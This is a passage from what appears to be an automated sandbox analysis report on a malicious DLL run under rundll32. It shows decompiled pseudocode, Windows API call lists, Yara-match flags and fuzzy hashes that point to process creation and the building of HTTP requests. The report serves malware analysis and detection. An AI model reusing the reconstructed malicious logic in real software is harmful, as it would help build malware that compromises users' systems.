                                                          									goto L46;
                                                          								}
                                                          							} else {
                                                          								goto L16;
                                                          							}
                                                          							while(1) {
                                                          								L16:
                                                          								__eflags =  *((intOrPtr*)(0x36da388 + _t58 * 4)) - _t110;
                                                          								if( *((intOrPtr*)(0x36da388 + _t58 * 4)) == _t110) {
                                                          									break;
                                                          								}
                                                          								_t58 = _t58 + 1;
                                                          								__eflags = _t58 - _t81;
                                                          								if(_t58 < _t81) {
                                                          									continue;
                                                          								}
                                                          								goto L18;
                                                          							}
                                                          							__eflags = _t58;
                                                          							if(_t58 <= 0) {
                                                          								goto L5;
                                                          							}
                                                          							 *0x36da3c8 = 1;
                                                          							__eflags =  *0x36da3c8;
                                                          							if( *0x36da3c8 != 0) {
                                                          								goto L5;
                                                          							}
                                                          							__eflags =  *((intOrPtr*)(0x36da388 + _t58 * 4)) - _t110;
                                                          							if( *((intOrPtr*)(0x36da388 + _t58 * 4)) == _t110) {
                                                          								L32:
                                                          								_t100 = 0;
                                                          								__eflags = _t58;
                                                          								if(_t58 < 0) {
                                                          									L34:
                                                          									 *0x36da3c8 = 0;
                                                          									goto L5;
                                                          								} else {
                                                          									goto L33;
                                                          								}
                                                          								do {
                                                          									L33:
                                                          									_t90 = 0x36da388 + _t100 * 4;
                                                          									_t100 = _t100 + 1;
                                                          									__eflags = _t100 - _t58;
                                                          									 *_t90 = _t110;
                                                          									_t110 =  *_t90;
                                                          								} while (_t100 <= _t58);
                                                          								goto L34;
                                                          							}
                                                          							_t25 = _t81 - 1; // -1
                                                          							_t58 = _t25;
                                                          							__eflags = _t58;
                                                          							if(_t58 < 0) {
                                                          								L28:
                                                          								__eflags = _t81 - 0x10;
                                                          								if(_t81 < 0x10) {
                                                          									_t81 = _t81 + 1;
                                                          									__eflags = _t81;
                                                          									 *0x36da380 = _t81;
                                                          								}
                                                          								_t28 = _t81 - 1; // 0x0
                                                          								_t58 = _t28;
                                                          								goto L32;
                                                          							} else {
                                                          								goto L25;
                                                          							}
                                                          							while(1) {
                                                          								L25:
                                                          								__eflags =  *((intOrPtr*)(0x36da388 + _t58 * 4)) - _t110;
                                                          								if( *((intOrPtr*)(0x36da388 + _t58 * 4)) == _t110) {
                                                          									break;
                                                          								}
                                                          								_t58 = _t58 - 1;
                                                          								__eflags = _t58;
                                                          								if(_t58 >= 0) {
                                                          									continue;
                                                          								}
                                                          								break;
                                                          							}
                                                          							__eflags = _t58;
                                                          							if(__eflags >= 0) {
                                                          								if(__eflags == 0) {
                                                          									goto L34;
                                                          								}
                                                          								goto L32;
                                                          							}
                                                          							goto L28;
                                                          						}
                                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                          						__eflags = _t75 - _v8;
                                                          						if(_t75 < _v8) {
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _t75 - _t108;
                                                          						if(_t75 >= _t108) {
                                                          							goto L20;
                                                          						}
                                                          						goto L15;
                                                          					}
                                                          					L5:
                                                          					_t63 = 1;
                                                          					goto L60;
                                                          				} else {
                                                          					goto L3;
                                                          				}
                                                          			}

                                                          APIs
                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 036D8572
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: MemoryQueryVirtual
                                                          • String ID:
                                                          • API String ID: 2850889275-0
                                                          • Opcode ID: 9e62256cc04b629e6d6a9bae1b70a568b78d4c50d5d328631b241fc4d573143e
                                                          • Instruction ID: 7df569839b6c323d5e7669e87e98dca3839e4ffd3f844fa89610908a7a7dd765
                                                          • Opcode Fuzzy Hash: 9e62256cc04b629e6d6a9bae1b70a568b78d4c50d5d328631b241fc4d573143e
                                                          • Instruction Fuzzy Hash: F561F770F0064A9FDB69CE2CC59867A73A6FB85364F2C856DD806CB784E731D852C744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 06288EC7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateProcessUser
                                                          • String ID:
                                                          • API String ID: 2217836671-0
                                                          • Opcode ID: a8a0d7d239bb1cfbb5ae453dc360bf04ed21e725d516dfa9e98e7a7ba24af93a
                                                          • Instruction ID: fbda430c4e452e2ae513606f3cfe242b040c86d8addf31c863c703059ad3daea
                                                          • Opcode Fuzzy Hash: a8a0d7d239bb1cfbb5ae453dc360bf04ed21e725d516dfa9e98e7a7ba24af93a
                                                          • Instruction Fuzzy Hash: 3611C03252124AAFDF425E98ED00DDA7BA6FF48364B494115FE1952160C736C871EF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 062736D3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorStatus
                                                          • String ID:
                                                          • API String ID: 1596131371-0
                                                          • Opcode ID: b38b0e4fe69e4840bb5e8c151431bfd7222005836bfcfb81a5627f0bd1932ec7
                                                          • Instruction ID: ed67731b78c1adaadd746e696c1816d6533aeae53778463f67a51ad808681770
                                                          • Opcode Fuzzy Hash: b38b0e4fe69e4840bb5e8c151431bfd7222005836bfcfb81a5627f0bd1932ec7
                                                          • Instruction Fuzzy Hash: E6C01236E053036BDE199A51E81CD2E7B52AB94351F00441CB64A90460C6319450DB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 71%
                                                          			E036D829C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				void* __ebp;
                                                          				signed int* _t43;
                                                          				char _t44;
                                                          				void* _t46;
                                                          				void* _t49;
                                                          				intOrPtr* _t53;
                                                          				void* _t54;
                                                          				void* _t55; /* was used below without a declaration in the decompiler output */
                                                          				void* _t65;
                                                          				long _t66;
                                                          				signed int* _t80;
                                                          				signed int* _t82;
                                                          				void* _t84;
                                                          				signed int _t86;
                                                          				void* _t89;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t99;
                                                          				void* _t106;
                                                          
                                                          				_t43 = _t84;
                                                          				_t65 = __ebx + 2;
                                                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                          				_t89 = _t95;
                                                          				_t96 = _t95 - 8;
                                                          				_push(_t65);
                                                          				_push(_t84);
                                                          				_push(_t89);
                                                          				asm("cld");
                                                          				_t66 = _a8;
                                                          				_t44 = _a4;
                                                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                          					_push(_t89);
                                                          					E036D8407(_t66 + 0x10, _t66, 0xffffffff);
                                                          					_t46 = 1;
                                                          				} else {
                                                          					_v12 = _t44;
                                                          					_v8 = _a12;
                                                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                          					_t86 =  *(_t66 + 0xc);
                                                          					_t80 =  *(_t66 + 8);
                                                          					_t49 = E036D84C1(_t66);
                                                          					_t99 = _t96 + 4;
                                                          					if(_t49 == 0) {
                                                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                          						goto L11;
                                                          					} else {
                                                          						while(_t86 != 0xffffffff) {
                                                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                          							if(_t53 == 0) {
                                                          								L8:
                                                          								_t80 =  *(_t66 + 8);
                                                          								_t86 = _t80[_t86 + _t86 * 2];
                                                          								continue;
                                                          							} else {
                                                          								_t54 =  *_t53();
                                                          								_t89 = _t89;
                                                          								_t86 = _t86;
                                                          								_t66 = _a8;
                                                          								_t55 = _t54;
                                                          								_t106 = _t54;
                                                          								if(_t106 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									if(_t106 < 0) {
                                                          										_t46 = 0;
                                                          									} else {
                                                          										_t82 =  *(_t66 + 8);
                                                          										E036D83AC(_t55, _t66);
                                                          										_t89 = _t66 + 0x10;
                                                          										E036D8407(_t89, _t66, 0);
                                                          										_t99 = _t99 + 0xc;
                                                          										E036D84A3(_t82[2]);
                                                          										 *(_t66 + 0xc) =  *_t82;
                                                          										_t66 = 0;
                                                          										_t86 = 0;
                                                          										 *(_t82[2])(1);
                                                          										goto L8;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						L11:
                                                          						_t46 = 1;
                                                          					}
                                                          				}
                                                          				L13:
                                                          				return _t46;
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                          • Instruction ID: d86d1e149c89557073586aabc4511a6d370b196a159bd96f23358bd8920dd5a1
                                                          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                          • Instruction Fuzzy Hash: CE21B672D002049FCB10DFA8C8849ABFBA9FF48350B4A85A8D95D9B245E730F915C7E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                          • Instruction ID: 7202e926a8723cc08ece4e6f02340c3aaa922725876c55feeb385bea7de8714f
                                                          • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                          • Instruction Fuzzy Hash: DA219272910205ABCF50EF68C8809ABB7A5FF84310B0581A9DD568B245D730FA15C7F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06285C28: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 06285C5C
                                                            • Part of subcall function 06285C28: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 06285D1D
                                                            • Part of subcall function 06285C28: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 06285D26
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 06273860
                                                            • Part of subcall function 0627A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0627A990
                                                            • Part of subcall function 0627A976: CreateWaitableTimerA.KERNEL32(0629A1E8,00000001,?), ref: 0627A9AD
                                                            • Part of subcall function 0627A976: GetLastError.KERNEL32(?,00000000,06288C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0627A9BE
                                                            • Part of subcall function 0627A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627A9FE
                                                            • Part of subcall function 0627A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA1D
                                                            • Part of subcall function 0627A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA33
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 062738C3
                                                          • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 0627393F
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 06273961
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 062739A1
                                                            • Part of subcall function 0627F08E: RtlAllocateHeap.NTDLL(00000000,00000010,76CDF730), ref: 0627F0B0
                                                            • Part of subcall function 0627F08E: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,06273899,?), ref: 0627F0DE
                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 06273A47
                                                          • CloseHandle.KERNEL32(?), ref: 06273CD6
                                                            • Part of subcall function 0627E2E6: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,06273A69,?), ref: 0627E2F2
                                                            • Part of subcall function 0627E2E6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,06273A69,?), ref: 0627E320
                                                            • Part of subcall function 0627E2E6: ResetEvent.KERNEL32(?,?,?,?,?,06273A69,?), ref: 0627E33A
                                                          • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 06273A7C
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273A8B
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 06273AB8
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 06273AD2
                                                          • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 06273B1A
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 06273B34
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 06273B4A
                                                          • ReleaseMutex.KERNEL32(?), ref: 06273B67
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273B78
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273B87
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 06273BBB
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 06273BD5
                                                          • SwitchToThread.KERNEL32 ref: 06273BD7
                                                          • ReleaseMutex.KERNEL32(?), ref: 06273BE1
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273C1F
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273C2A
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 06273C4D
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 06273C67
                                                          • SwitchToThread.KERNEL32 ref: 06273C69
                                                          • ReleaseMutex.KERNEL32(?), ref: 06273C73
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273C88
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273CEA
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273CF6
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273D02
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273D0E
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273D1A
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273D26
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273D32
                                                          • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 06273D41
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                                                          • String ID:
                                                          • API String ID: 2369282788-0
                                                          • Opcode ID: 4f525501c668425ab66889d4a71c8a5d5305f3d29523f9b0e678ed79514ebcb2
                                                          • Instruction ID: 7444b16c77bfdf1d330a53c4e64b59fa84b8b0235820857b884e2e45a2150a85
                                                          • Opcode Fuzzy Hash: 4f525501c668425ab66889d4a71c8a5d5305f3d29523f9b0e678ed79514ebcb2
                                                          • Instruction Fuzzy Hash: 82E1B271824312AFDB91EF64DC84D6AB7E9FB84354F044A2DFA95921A0D731CC44DF22
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 0628F1E5
                                                          • GetTickCount.KERNEL32 ref: 0628F1FF
                                                          • wsprintfA.USER32 ref: 0628F252
                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0628F25E
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0628F269
                                                          • _aulldiv.NTDLL(?,?,?,?), ref: 0628F27F
                                                          • wsprintfA.USER32 ref: 0628F295
                                                          • wsprintfA.USER32 ref: 0628F2AF
                                                          • wsprintfA.USER32 ref: 0628F2D4
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628F2E7
                                                          • wsprintfA.USER32 ref: 0628F30B
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628F31E
                                                          • wsprintfA.USER32 ref: 0628F358
                                                          • wsprintfA.USER32 ref: 0628F37C
                                                          • lstrcat.KERNEL32(?,?), ref: 0628F3B4
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0628F3CE
                                                          • GetTickCount.KERNEL32 ref: 0628F3DE
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 0628F3F2
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 0628F410
                                                          • StrTrimA.SHLWAPI(00000000,062953E8,00000000,0689C310), ref: 0628F449
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0628F46B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0628F472
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0628F479
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0628F480
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0628F4FA
                                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 0628F50C
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,0689C310), ref: 0628F51B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628F52D
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628F53F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Freewsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                                                          • String ID:
                                                          • API String ID: 4198993012-0
                                                          • Opcode ID: ec64257c32074ba13de7e4917ff5f338ea7d24901cd2e9dced4ad7477fdab184
                                                          • Instruction ID: 4d04c3046320b281fe05299989fb87b35032fb3084a1aa014fe6e183a960caa5
                                                          • Opcode Fuzzy Hash: ec64257c32074ba13de7e4917ff5f338ea7d24901cd2e9dced4ad7477fdab184
                                                          • Instruction Fuzzy Hash: A2A15D71600306AFCB41EF68FD88E5A3BEAEF88354F040419FA19D6251E735D859DFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000000,?,?), ref: 06287B51
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 06287BED
                                                          • lstrcpyn.KERNEL32(00000000,?,?), ref: 06287C02
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06287C1D
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,?,?,?), ref: 06287D04
                                                          • StrChrA.SHLWAPI(00000001,00000020), ref: 06287D15
                                                          • lstrlen.KERNEL32(00000000), ref: 06287D29
                                                          • memmove.NTDLL(?,?,00000001), ref: 06287D39
                                                          • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 06287D65
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06287D8B
                                                          • memcpy.NTDLL(00000000,?,?), ref: 06287D9F
                                                          • memcpy.NTDLL(?,?,?), ref: 06287DBF
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06287DFB
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 06287EC1
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 06287F09
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                                          • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                                          • API String ID: 3227826163-647159250
                                                          • Opcode ID: 02d45709c516fc910895558f7c40ebec2a2650164d5ec53e3203335b73c69601
                                                          • Instruction ID: 1e20e12c2168a3ca38898f3500c3a9356ee71f3bc3af499c405c55e0c7aacf31
                                                          • Opcode Fuzzy Hash: 02d45709c516fc910895558f7c40ebec2a2650164d5ec53e3203335b73c69601
                                                          • Instruction Fuzzy Hash: C2E14C31A21206EFDB55EFA8DC88BAE7BB5FF44300F248558ED15AB291D730E950DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 0627E65B
                                                          • wsprintfA.USER32 ref: 0627E6C5
                                                          • wsprintfA.USER32 ref: 0627E70B
                                                          • wsprintfA.USER32 ref: 0627E72C
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0627E763
                                                          • wsprintfA.USER32 ref: 0627E784
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627E79E
                                                          • wsprintfA.USER32 ref: 0627E7C5
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627E7DA
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0627E7F4
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 0627E815
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 0627E82F
                                                            • Part of subcall function 0628EA15: lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0627E842,00000000,0689C310), ref: 0628EA40
                                                            • Part of subcall function 0628EA15: lstrlen.KERNEL32(?,?,00000000,0627E842,00000000,0689C310), ref: 0628EA48
                                                            • Part of subcall function 0628EA15: strcpy.NTDLL ref: 0628EA5F
                                                            • Part of subcall function 0628EA15: lstrcat.KERNEL32(00000000,?), ref: 0628EA6A
                                                            • Part of subcall function 0628EA15: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0627E842,00000000,0689C310), ref: 0628EA87
                                                          • StrTrimA.SHLWAPI(00000000,062953E8,00000000,0689C310), ref: 0627E864
                                                            • Part of subcall function 06278DC7: lstrlen.KERNEL32(06898560,76C85520,76CC81D0,773BEEF0,0627E873,?), ref: 06278DD7
                                                            • Part of subcall function 06278DC7: lstrlen.KERNEL32(?), ref: 06278DDF
                                                            • Part of subcall function 06278DC7: lstrcpy.KERNEL32(00000000,06898560), ref: 06278DF3
                                                            • Part of subcall function 06278DC7: lstrcat.KERNEL32(00000000,?), ref: 06278DFE
                                                          • lstrcpy.KERNEL32(?,?), ref: 0627E88D
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0627E897
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0627E8A2
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0627E8A9
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 0627E8B4
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 0627E8D0
                                                            • Part of subcall function 06277DF5: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,06285583,00000000,00000000), ref: 06277E46
                                                            • Part of subcall function 06277DF5: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 06277ED9
                                                          • HeapFree.KERNEL32(00000000,?,00000001,0689C310,?,?,?), ref: 0627E997
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 0627E9AF
                                                          • HeapFree.KERNEL32(00000000,?,00000000,0689C310), ref: 0627E9BD
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627E9CB
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627E9D6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                                                          • String ID:
                                                          • API String ID: 4032678529-0
                                                          • Opcode ID: 1f77de2821ac148abf04d8da955da1db11ac094f03bdcf90e85843665525a256
                                                          • Instruction ID: d5297447f01a4369e69d37d42db57dd164399ea6243bb4f2489e15ce3503ed25
                                                          • Opcode Fuzzy Hash: 1f77de2821ac148abf04d8da955da1db11ac094f03bdcf90e85843665525a256
                                                          • Instruction Fuzzy Hash: BDB17771A14302EFDB819F69EC88E5A7BEABFC8214F054418FA59DB260D735E814CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E036D300E(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                                                          				intOrPtr _v4;
                                                          				signed int _v8;
                                                          				int* _v12;
                                                          				char* _v16;
                                                          				intOrPtr _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				void* _v40;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				long _t66;
                                                          				intOrPtr _t67;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t70;
                                                          				intOrPtr _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          				int _t78;
                                                          				intOrPtr _t79;
                                                          				int _t82;
                                                          				intOrPtr _t83;
                                                          				intOrPtr _t84;
                                                          				void* _t86;
                                                          				void* _t89;
                                                          				intOrPtr _t93;
                                                          				intOrPtr _t97;
                                                          				intOrPtr* _t99;
                                                          				int* _t105;
                                                          				int* _t115;
                                                          				char** _t117;
                                                          				char* _t118;
                                                          				intOrPtr* _t123;
                                                          				intOrPtr* _t125;
                                                          				intOrPtr* _t127;
                                                          				intOrPtr* _t129;
                                                          				intOrPtr _t132;
                                                          				intOrPtr _t136;
                                                          				int _t139;
                                                          				intOrPtr _t141;
                                                          				int _t144;
                                                          				void* _t145;
                                                          				intOrPtr _t159;
                                                          				void* _t161;
                                                          				int _t162;
                                                          				void* _t163;
                                                          				void* _t164;
                                                          				long _t165;
                                                          				intOrPtr* _t166;
                                                          				intOrPtr* _t167;
                                                          				intOrPtr _t168;
                                                          				intOrPtr* _t171;
                                                          				char** _t174;
                                                          				char** _t176;
                                                          				char** _t177;
                                                          				void* _t182;
                                                          
                                                          				_t66 = __eax;
                                                          				_t174 =  &_v16;
                                                          				_t145 = _a20;
                                                          				_a20 = 8;
                                                          				if(__eax == 0) {
                                                          					_t66 = GetTickCount();
                                                          				}
                                                          				_t67 =  *0x36da018; // 0x3df0b315
                                                          				asm("bswap eax");
                                                          				_t68 =  *0x36da014; // 0x3a87c8cd
                                                          				asm("bswap eax");
                                                          				_t69 =  *0x36da010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t70 =  *0x36da00c; // 0x81762942
                                                          				asm("bswap eax");
                                                          				_t71 =  *0x36da348; // 0x228d5a8
